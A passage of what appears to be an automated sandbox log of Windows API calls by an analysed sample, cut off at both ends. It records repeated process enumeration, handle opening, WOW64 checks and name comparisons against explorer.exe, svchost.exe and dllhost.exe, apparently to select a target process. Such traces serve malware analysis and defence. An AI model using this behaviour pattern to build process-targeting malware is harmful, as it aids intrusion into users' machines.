dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0174.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0174.680] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.680] CloseHandle (hObject=0xd8) returned 1 [0174.680] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0174.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0174.681] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.681] CloseHandle (hObject=0xd8) returned 1 [0174.681] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0174.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0174.681] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.681] CloseHandle (hObject=0xd8) returned 1 [0174.682] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0174.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0174.682] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.682] CloseHandle (hObject=0xd8) returned 1 [0174.682] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0174.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0174.683] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.683] CloseHandle (hObject=0xd8) returned 1 [0174.683] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0174.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0174.683] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.684] CloseHandle (hObject=0xd8) returned 1 [0174.684] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0174.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0174.684] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0174.685] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0174.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0174.685] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0174.686] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0174.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0174.686] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0174.687] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0174.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0174.687] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.687] CloseHandle (hObject=0xd8) returned 1 [0174.687] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0174.687] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0174.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0174.688] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.688] CloseHandle (hObject=0xd8) returned 1 [0174.688] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0174.688] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0174.688] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0174.688] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0174.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0174.688] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0174.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0174.689] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.689] CloseHandle (hObject=0xd8) returned 1 [0174.689] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0174.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0174.689] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.690] CloseHandle (hObject=0xd8) returned 1 [0174.690] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0174.690] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0174.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0174.690] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.690] CloseHandle (hObject=0xd8) returned 1 [0174.690] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0174.691] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0174.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x968) returned 0xd8 [0174.691] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.691] CloseHandle (hObject=0xd8) returned 1 [0174.691] lstrcmpiA (lpString1="regsvr32.exe", lpString2="explorer.exe") returned 1 [0174.691] lstrcmpiA (lpString1="regsvr32.exe", lpString2="svchost.exe") returned -1 [0174.691] lstrcmpiA (lpString1="regsvr32.exe", lpString2="dllhost.exe") returned 1 [0174.691] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0174.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0174.692] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0174.692] CloseHandle (hObject=0xd8) returned 1 [0174.692] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0174.692] CloseHandle (hObject=0xd4) returned 1 [0174.693] Sleep (dwMilliseconds=0x3e8) [0175.743] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0175.745] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0175.746] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0175.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0175.746] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0175.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0175.747] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0175.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0175.747] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0175.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0175.748] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0175.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0175.748] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0175.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0175.749] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0175.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0175.749] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0175.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0175.750] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0175.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0175.750] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0175.751] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0175.751] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0175.752] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0175.753] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0175.753] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0175.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0175.754] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0175.754] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0175.755] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0175.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0175.755] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.755] CloseHandle (hObject=0xd8) returned 1 [0175.755] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0175.755] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0175.755] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0175.755] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0175.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0175.756] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0175.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0175.756] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.756] CloseHandle (hObject=0xd8) returned 1 [0175.757] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0175.757] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0175.757] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0175.757] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0175.757] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0175.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0175.758] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0175.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0175.758] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.758] CloseHandle (hObject=0xd8) returned 1 [0175.758] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0175.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0175.759] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.759] CloseHandle (hObject=0xd8) returned 1 [0175.759] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0175.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0175.759] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.760] CloseHandle (hObject=0xd8) returned 1 [0175.760] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0175.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0175.760] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.760] CloseHandle (hObject=0xd8) returned 1 [0175.760] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0175.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0175.761] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.761] CloseHandle (hObject=0xd8) returned 1 [0175.761] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0175.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0175.761] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.761] CloseHandle (hObject=0xd8) returned 1 [0175.761] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0175.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0175.762] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.762] CloseHandle (hObject=0xd8) returned 1 [0175.762] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0175.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0175.762] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0175.763] CloseHandle (hObject=0xd8) returned 1 [0175.763] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, 